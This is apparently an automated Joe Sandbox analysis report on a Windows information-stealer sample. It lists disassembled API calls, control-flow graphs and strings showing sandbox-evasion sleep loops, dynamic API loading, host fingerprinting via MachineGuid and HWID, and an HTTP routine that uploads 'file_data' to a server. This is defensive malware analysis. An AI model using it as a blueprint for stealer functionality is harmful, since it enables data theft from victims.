                                                    • Sleep.KERNEL32(00000014), ref: 0041AB1E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB26
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB2E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB36
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB3E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB46
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB53
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB5B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB63
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB6B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB73
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB7B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB83
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB8B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB93
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB9B
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABA3
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABAB
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABB8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABC0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABC8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABD0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABD8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABE0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABE8
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABF0
                                                    • Sleep.KERNEL32(00000014), ref: 0041ABF8
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC00
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC08
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC10
                                                    • CloseHandle.KERNEL32(?), ref: 0041AC19
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC21
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC29
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC31
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC39
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC41
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC49
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC51
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC59
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC61
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC69
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC71
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC79
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC81
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC89
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC91
                                                    • Sleep.KERNEL32(00000014), ref: 0041AC99
                                                    • Sleep.KERNEL32(00000014), ref: 0041ACA1
                                                    • Sleep.KERNEL32(00000014), ref: 0041ACA9
                                                    • ExitProcess.KERNEL32 ref: 0041ACB1
                                                    Strings
                                                    • Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l, xrefs: 0041A787, 0041A828
                                                    • GetSystemTime, xrefs: 0041A7CF
                                                    • Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea, xrefs: 0041A771, 0041A812
                                                    • The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia, xrefs: 0041A792, 0041A833
                                                    • The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On, xrefs: 0041A77C, 0041A81D
                                                    • Sleep, xrefs: 0041A7BC
                                                    • kernel32.dll, xrefs: 0041A7A8
                                                    • I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and, xrefs: 0041A79D, 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep$lstrlen$AddressCloseEventHandleProclstrcpy$CreateExitLibraryLoadOpenProcesslstrcat
                                                    • String ID: GetSystemTime$I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and$Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l$Sleep$Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea$The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia$The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On$kernel32.dll
                                                    • API String ID: 1968030747-1157189060
                                                    • Opcode ID: 54532dd25730401e9619ccf941eb7a63a5c16019b915d8d70357fc5f908c5c95
                                                    • Instruction ID: d0fc9c7f70cd4d74f070b5276f1611ca398b8472acf39be3ffb0404d49fc07f7
                                                    • Opcode Fuzzy Hash: 54532dd25730401e9619ccf941eb7a63a5c16019b915d8d70357fc5f908c5c95
                                                    • Instruction Fuzzy Hash: 40D1AB356E121DEFDB006BE0AC2EBE87A6AAB17702F551125B30E9D0F0DAB444C19F75
                                                    Function 0041AAD6 Relevance: 105.2, APIs: 70, Instructions: 160sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep$CloseEventHandle$CreateExitOpenProcess
                                                    • String ID:
                                                    • API String ID: 3990214622-0
                                                    • Opcode ID: 939382f14eacfc35bc189caa75c6057b8e340a7325aef0680f6e940db5972843
                                                    • Instruction ID: 010346d2f35c5d2b6dfb22c7d70376198b9011b0162d7776d674804ad5e558a3
                                                    • Opcode Fuzzy Hash: 939382f14eacfc35bc189caa75c6057b8e340a7325aef0680f6e940db5972843
                                                    • Instruction Fuzzy Hash: AC5157395E620DEFEB006BE09D1EBE83666AB17706F151015B30E9C0F0CA7444C59F36
                                                    Function 00404E03 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 713stringnetworkmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 634 404e03-404ef7 call 411668 call 4116b4 call 40430f call 41302d call 41193a lstrlenA call 41193a call 41302d call 411668 * 4 StrCmpCA 657 404f00-404f04 634->657 658 404ef9 634->658 659 404f20-404f24 657->659 660 404f06-404f1d call 41193a InternetOpenA 657->660 658->657 662 40582a-4058ba call 412bcb * 2 call 4118d5 * 4 call 4116b4 call 411701 * 9 659->662 663 404f2a-405038 call 412d64 call 4117e0 call 41177a call 411701 * 2 call 41185b call 4117e0 call 41185b call 41177a call 411701 * 3 call 41185b call 4117e0 call 41177a call 411701 * 2 InternetConnectA 659->663 660->659 729 4058bd-4058c0 662->729 663->662 732 40503e-405049 663->732 733 405057 732->733 734 40504b-405055 732->734 735 405061-40508f HttpOpenRequestA 733->735 734->735 736 405095-405099 735->736 737 40581e-405824 InternetCloseHandle 735->737 738 4050c0-405695 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 402278 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41193a lstrlenA call 41193a lstrlenA GetProcessHeap HeapAlloc call 41193a lstrlenA call 41193a memcpy call 41193a lstrlenA memcpy call 41193a lstrlenA call 41193a * 2 lstrlenA memcpy call 41193a lstrlenA call 41193a HttpSendRequestA call 412bcb HttpQueryInfoA 736->738 739 40509b-4050ba InternetSetOptionA 736->739 737->662 944 4056f7-405714 call 412b90 738->944 945 405697-4056f2 call 411668 call 411701 * 9 738->945 739->738 951 4057b5-405810 call 411668 call 411701 * 9 944->951 952 40571a-405743 InternetReadFile 944->952 945->729 951->729 955 405745-40574c 952->955 956 40574e-4057a9 call 41193a StrCmpCA 952->956 955->956 959 405750-40578e call 41185b call 41177a call 411701 955->959 969 4057b3-405818 InternetCloseHandle 956->969 970 4057ab-4057ad ExitProcess 956->970 959->952 969->737
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • lstrlenA.KERNEL32(00000000), ref: 00404E8B
                                                      • Part of subcall function 0041302D: CryptBinaryToStringA.CRYPT32(00000000,00404E7F,40000001,00000000,00000000), ref: 0041304A
                                                    • StrCmpCA.SHLWAPI(?,00425200,00425200,00425200,00425200), ref: 00404EEF
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F17
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405025
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405082
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004050BA
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00428D7C,00000000,?,00000000,00000000), ref: 00405579
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040558D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040559D
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004055A4
                                                    • lstrlenA.KERNEL32(00000000), ref: 004055B9
                                                    • memcpy.MSVCRT ref: 004055CF
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004055E6
                                                    • memcpy.MSVCRT ref: 004055F3
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405604
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040561D
                                                    • memcpy.MSVCRT ref: 0040562D
                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405647
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0040565A
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040568D
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405730
                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 004057A1
                                                    • ExitProcess.KERNEL32 ref: 004057AD
                                                    • InternetCloseHandle.WININET(00000000), ref: 00405824
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen$Internet$lstrcpy$Httpmemcpy$HeapOpenProcessRequestlstrcat$AllocBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                    • String ID: ------$"$--$------$ERROR$block$build_id$file_data
                                                    • API String ID: 291296625-1063948816
                                                    • Opcode ID: 941268b52b4c2f1080921e961083cd3901daec87e8b66a8e899ed6db65051c96
                                                    • Instruction ID: 347b2e4d89f66f0c0c6539a9aa54472735362a414d5b47530b2be4bc622c77f0
                                                    • Opcode Fuzzy Hash: 941268b52b4c2f1080921e961083cd3901daec87e8b66a8e899ed6db65051c96
                                                    • Instruction Fuzzy Hash: 76520E729101189ADB14FBA1EC96FDE7379AF15305F5080AAF216B21F1DF386A88CF54
                                                    Function 0041AD16 Relevance: 49.7, APIs: 33, Instructions: 151libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1005 41ad16-41ad2a call 41acf3 1008 41ad30-41af26 call 407aba GetProcAddress * 21 1005->1008 1009 41af2b-41af87 LoadLibraryA * 5 1005->1009 1008->1009 1011 41afa0-41afa7 1009->1011 1012 41af89-41af9b GetProcAddress 1009->1012 1014 41afd7-41afde 1011->1014 1015 41afa9-41afd2 GetProcAddress * 2 1011->1015 1012->1011 1016 41afe0-41aff2 GetProcAddress 1014->1016 1017 41aff7-41affe 1014->1017 1015->1014 1016->1017 1018 41b000-41b012 GetProcAddress 1017->1018 1019 41b017-41b01e 1017->1019 1018->1019 1020 41b020-41b049 GetProcAddress * 2 1019->1020 1021 41b04e-41b04f 1019->1021 1020->1021
                                                    APIs
                                                    • GetProcAddress.KERNEL32 ref: 0041AD54
                                                    • GetProcAddress.KERNEL32 ref: 0041AD6B
                                                    • GetProcAddress.KERNEL32 ref: 0041AD82
                                                    • GetProcAddress.KERNEL32 ref: 0041AD99
                                                    • GetProcAddress.KERNEL32 ref: 0041ADB0
                                                    • GetProcAddress.KERNEL32 ref: 0041ADC7
                                                    • GetProcAddress.KERNEL32 ref: 0041ADDE
                                                    • GetProcAddress.KERNEL32 ref: 0041ADF5
                                                    • GetProcAddress.KERNEL32 ref: 0041AE0C
                                                    • GetProcAddress.KERNEL32 ref: 0041AE23
                                                    • GetProcAddress.KERNEL32 ref: 0041AE3A
                                                    • GetProcAddress.KERNEL32 ref: 0041AE51
                                                    • GetProcAddress.KERNEL32 ref: 0041AE68
                                                    • GetProcAddress.KERNEL32 ref: 0041AE7F
                                                    • GetProcAddress.KERNEL32 ref: 0041AE96
                                                    • GetProcAddress.KERNEL32 ref: 0041AEAD
                                                    • GetProcAddress.KERNEL32 ref: 0041AEC4
                                                    • GetProcAddress.KERNEL32 ref: 0041AEDB
                                                    • GetProcAddress.KERNEL32 ref: 0041AEF2
                                                    • GetProcAddress.KERNEL32 ref: 0041AF09
                                                    • GetProcAddress.KERNEL32 ref: 0041AF20
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF31
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF42
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF53
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF64
                                                    • LoadLibraryA.KERNEL32(?,0041A8B3), ref: 0041AF75
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AF95
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFB5
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFCC
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041AFEC
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B00C
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B02C
                                                    • GetProcAddress.KERNEL32(?,0041A8B3), ref: 0041B043
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: 8ed0b4f8c3e954e1fc1dc6971364bbe040f0f26000e4905d9b82ffd922f5bdfa
                                                    • Instruction ID: e6d1e2ba0aaa9db7fee79aa5ca47b6abfb0ed3e486351d87d65decbaef8ebfc5
                                                    • Opcode Fuzzy Hash: 8ed0b4f8c3e954e1fc1dc6971364bbe040f0f26000e4905d9b82ffd922f5bdfa
                                                    • Instruction Fuzzy Hash: DD81C679481214EFEB026F60FE19AA43FA3F70B345715712AE90689670E77648A8EF40
                                                    Function 004151E4 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 830stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1022 4151e4-415e3c call 411668 call 41185b call 41177a call 411701 call 40226e call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411c63 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4125ca call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 412667 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411948 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 GetCurrentProcessId call 413563 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411add call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4127af call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4129bf call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411c21 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411bec call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41254a call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411d31 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411c63 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411cbf call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411eb5 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411f54 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 411f21 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 412081 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41210d call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41246a call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41218b call 4117e0 call 41177a call 411701 * 2 call 41218b call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41193a lstrlenA call 41193a call 411668 call 40134c call 418db9 call 411701 * 2 call 40131a
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00411C63: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,Version: ,00425200), ref: 00411C70
                                                      • Part of subcall function 00411C63: HeapAlloc.KERNEL32(00000000), ref: 00411C77
                                                      • Part of subcall function 00411C63: GetLocalTime.KERNEL32(?), ref: 00411C84
                                                      • Part of subcall function 00411C63: wsprintfA.USER32 ref: 00411CB1
                                                      • Part of subcall function 004125CA: memset.MSVCRT ref: 004125F2
                                                      • Part of subcall function 004125CA: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00412612
                                                      • Part of subcall function 004125CA: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00412639
                                                      • Part of subcall function 004125CA: CharToOemA.USER32(00000000,?), ref: 00412659
                                                      • Part of subcall function 00412667: GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 00411948: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
                                                      • Part of subcall function 00411948: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                      • Part of subcall function 00411948: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                      • Part of subcall function 00411948: HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00428FE4,00000000,?,00000000,00000000,?,HWID: ,00000000,?,00428E48,00000000), ref: 00415497
